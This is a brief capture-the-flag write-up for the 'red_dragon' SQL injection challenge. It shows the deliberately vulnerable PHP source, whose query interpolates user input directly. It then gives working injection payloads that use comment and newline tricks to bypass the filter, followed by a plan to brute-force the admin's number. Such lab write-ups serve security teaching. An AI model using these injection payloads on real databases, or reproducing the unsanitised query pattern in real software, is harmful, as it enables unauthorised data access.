problem
-------
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\./i', $_GET['id'])) exit("No Hack ~_~");
  if(strlen($_GET['id']) > 7) exit("too long string");
  $no = is_numeric($_GET['no']) ? $_GET['no'] : 1;
  $query = "select id from prob_red_dragon where id='{$_GET['id']}' and no={$no}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result['id']}</h2>";

  $query = "select no from prob_red_dragon where id='admin'"; // if you think challenge got wrong, look column name again.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['no'] === $_GET['no']) solve("red_dragon");
  highlight_file(__FILE__);
?>

step1
-----

payload : ?id=admin'%23

result work...

payload : ?id='||no>%23&no=%0A1
query : select id from prob_red_dragon where id=''||no>#' and no= 1


step2
-----

Find the no range:


query : select id from prob_red_dragon where id=''||no>#' and no= 1000000000

-> false

Cool. That's the max value. Try to search between max and max-(max/10) to find
the value: 1000000000 .. 100000000.

step3
-----

Brute. See 26_red_dragon.pl.
